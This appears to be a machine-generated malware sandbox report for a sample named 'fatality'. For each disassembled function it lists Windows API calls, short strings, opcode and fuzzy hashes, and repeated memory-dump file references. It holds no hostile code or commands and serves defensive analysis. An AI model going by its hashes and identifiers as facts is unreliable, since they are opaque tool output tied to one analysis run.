                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _com_issue_error
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2162355165-0
                                                                                                                                                            • Opcode ID: 7dace81ec6efd4fd035d473262216ca1e2bb89e3d5c61d911a4e7287391fdf84
                                                                                                                                                            • Instruction ID: 5b8434b5a7af1cc0a2e98539684b1c084b040984afd93dba2f627f9c1e6d6b3b
                                                                                                                                                            • Opcode Fuzzy Hash: 7dace81ec6efd4fd035d473262216ca1e2bb89e3d5c61d911a4e7287391fdf84
                                                                                                                                                            • Instruction Fuzzy Hash: FE41A671A0421DABD7109F78C845BBEBBA8FF48710F148239FB15EB292D7349940C7A5
                                                                                                                                                            Function 008E1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                            • Opcode ID: f056fc8ba6b81a39b75dba85b1051d4b90c7b2727531c43463b8a08aee18250b
                                                                                                                                                            • Instruction ID: 089704485c3269aa65b15a7e67158a5fb543258c4cd6268b9f87ee0a6e7874ef
                                                                                                                                                            • Opcode Fuzzy Hash: f056fc8ba6b81a39b75dba85b1051d4b90c7b2727531c43463b8a08aee18250b
                                                                                                                                                            • Instruction Fuzzy Hash: 8241C271A006699FCB219F788C499EE7BBCEF11310F004129FA45F7241DA30AE558BA1
                                                                                                                                                            Function 008FDC3B Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FDC61
                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FDC72
                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008FDC7C
                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008FDC86
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4217535847-0
                                                                                                                                                            • Opcode ID: c3ef50def1780aa6ef0555fbc99f60a4ca598ccb874190a3caabfaef951d595d
                                                                                                                                                            • Instruction ID: 79d895697811c8fd404d4844b3cc4784e30f6eda3a558fd7375f8ba41badf08d
                                                                                                                                                            • Opcode Fuzzy Hash: c3ef50def1780aa6ef0555fbc99f60a4ca598ccb874190a3caabfaef951d595d
                                                                                                                                                            • Instruction Fuzzy Hash: F1F03C72A15219BBCB206BB5DD4CDDF7F7DEF46791B008121F60AD2050D6748646D7A0
                                                                                                                                                            Function 008F1FDD Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                            • Opcode ID: 0cb4a40b254da3e47fc73714cd9ac9ab5e882a8ab798866bea4e667734aaa3e4
                                                                                                                                                            • Instruction ID: d6dc1d049b3bd2c8e6bbbc87f5e4c546b154c4a607acab44f5aa8c2d89869926
                                                                                                                                                            • Opcode Fuzzy Hash: 0cb4a40b254da3e47fc73714cd9ac9ab5e882a8ab798866bea4e667734aaa3e4
                                                                                                                                                            • Instruction Fuzzy Hash: 4FF01D37108018BFCF225F61EC09EDA7F2AEB84770B11C515F61A9A0A1CB729661D690
                                                                                                                                                            Function 008FA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetDC.USER32(00000000), ref: 008FA666
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 008FA675
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008FA683
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 008FA691
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                            • Opcode ID: 32476d45953e526fad40debb57b74eda97a74db51e3812a5d6fe60a5ce89238e
                                                                                                                                                            • Instruction ID: e0f6fee2e18c359bc329395ad0830ec8b12920535032fecba56c1c06800fc974
                                                                                                                                                            • Opcode Fuzzy Hash: 32476d45953e526fad40debb57b74eda97a74db51e3812a5d6fe60a5ce89238e
                                                                                                                                                            • Instruction Fuzzy Hash: 2FE0EC3596A721A7D3716B70AC0DF9B3F64AB16B52F018301FA05A61A0DBA486019BA1
                                                                                                                                                            Function 008FA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008FA699: GetDC.USER32(00000000), ref: 008FA69D
                                                                                                                                                              • Part of subcall function 008FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 008FA6A8
                                                                                                                                                              • Part of subcall function 008FA699: ReleaseDC.USER32(00000000,00000000), ref: 008FA6B3
                                                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 008FA83C
                                                                                                                                                              • Part of subcall function 008FAAC9: GetDC.USER32(00000000), ref: 008FAAD2
                                                                                                                                                              • Part of subcall function 008FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 008FAB01
                                                                                                                                                              • Part of subcall function 008FAAC9: ReleaseDC.USER32(00000000,?), ref: 008FAB99
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ObjectRelease$CapsDevice
                                                                                                                                                            • String ID: (
                                                                                                                                                            • API String ID: 1061551593-3887548279
                                                                                                                                                            • Opcode ID: 508746bfe9263fb129765ad429052246ea35a5fb9ed8af2245a59a915493fffa
                                                                                                                                                            • Instruction ID: 790b54458a00d13243411d4656172e44ac9f3ac1afca7df01a5d0787de60af4c
                                                                                                                                                            • Opcode Fuzzy Hash: 508746bfe9263fb129765ad429052246ea35a5fb9ed8af2245a59a915493fffa
                                                                                                                                                            • Instruction Fuzzy Hash: 7F91FFB5218354AFD614DF25C844A6BBBF8FFC9710F00891EF99AD3220DB70A945DB62
                                                                                                                                                            Function 008F161C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf
                                                                                                                                                            • String ID: %ls$%s: %s
                                                                                                                                                            • API String ID: 589789837-2259941744
                                                                                                                                                            • Opcode ID: 4cc6ef6a38ebc0b02d3b2d86f9520d1d01c4347a7997420d9c713c95ebd54364
                                                                                                                                                            • Instruction ID: c3c14d745f239869bf27e7b42840091fcc648bca15f660884d33c87d9193cbfe
                                                                                                                                                            • Opcode Fuzzy Hash: 4cc6ef6a38ebc0b02d3b2d86f9520d1d01c4347a7997420d9c713c95ebd54364
                                                                                                                                                            • Instruction Fuzzy Hash: D041A57538830CF6EE112AB48E4EF317665FB25B0CF244516F39AE84E1DAA75410BB1B
                                                                                                                                                            Function 008E9382 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E9387
                                                                                                                                                              • Part of subcall function 008EC29A: _wcslen.LIBCMT ref: 008EC2A2
                                                                                                                                                            • _swprintf.LIBCMT ref: 008E9465
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog_swprintf_wcslen
                                                                                                                                                            • String ID: rtmp%d
                                                                                                                                                            • API String ID: 4240179315-3303766350
                                                                                                                                                            • Opcode ID: d9686bbea79007b48af265c7d9f9430c3ba9a3e7d0aa7a47c3c0a74b791c1e52
                                                                                                                                                            • Instruction ID: fb5cb6b232ed3882e06b29d4632d38149d14ebf8b869d771a5a0ddac8289c0e9
                                                                                                                                                            • Opcode Fuzzy Hash: d9686bbea79007b48af265c7d9f9430c3ba9a3e7d0aa7a47c3c0a74b791c1e52
                                                                                                                                                            • Instruction Fuzzy Hash: A6418971900299A5CF21EB65CC45DEE737CFF56340F0088A5F68AE3051DB788B89DB61
                                                                                                                                                            Function 008E7401 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E7406
                                                                                                                                                              • Part of subcall function 008E3BBA: __EH_prolog.LIBCMT ref: 008E3BBF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                            • API String ID: 3519838083-639343689
                                                                                                                                                            • Opcode ID: df63e52e6cd61cb045cff85a79c24403c2e24b70a59e85499feef6627b8f3e04
                                                                                                                                                            • Instruction ID: 5cca81f490f9c562a71a2829bca83f7b846013c7a7b110357f4525e484915c0f
                                                                                                                                                            • Opcode Fuzzy Hash: df63e52e6cd61cb045cff85a79c24403c2e24b70a59e85499feef6627b8f3e04
                                                                                                                                                            • Instruction Fuzzy Hash: 6831D2B1E04298AADF21EBA9DC45BEE7BB8FF5A304F044015F405E7182C7748A84CB62
                                                                                                                                                            Function 008FB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                            • String ID: }
                                                                                                                                                            • API String ID: 176396367-4239843852
                                                                                                                                                            • Opcode ID: 1344702d2d95e567b436096be4f806c1c4888991b1f438059fc42666d06da364
                                                                                                                                                            • Instruction ID: 0ed8dbce94d5584a048818c888a5c8ccd2fd020bedd78324b82a58938528a200
                                                                                                                                                            • Opcode Fuzzy Hash: 1344702d2d95e567b436096be4f806c1c4888991b1f438059fc42666d06da364
                                                                                                                                                            • Instruction Fuzzy Hash: 3821DE7290430E5AD731AA78D945B7AB3ECEF95754F04042AF640C3141EB69DD4883A6
                                                                                                                                                            Function 008EB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _swprintf
                                                                                                                                                            • String ID: %c:\
                                                                                                                                                            • API String ID: 589789837-3142399695
                                                                                                                                                            • Opcode ID: ee945c2198c8028d3357b082495326df0c80176368d333bc33bc50440c2a9d83
                                                                                                                                                            • Instruction ID: 8d23762e2bd2b0314a7da9ee4971872aeed885736350c11421ccfa76e547e283
                                                                                                                                                            • Opcode Fuzzy Hash: ee945c2198c8028d3357b082495326df0c80176368d333bc33bc50440c2a9d83
                                                                                                                                                            • Instruction Fuzzy Hash: 8401F56350436179DA316B7B8C46E6BB7ACFFD3770B50851AF554D6082FB20D85082B1
                                                                                                                                                            Function 008FF462 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 008FF47E
                                                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 008FF4C1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
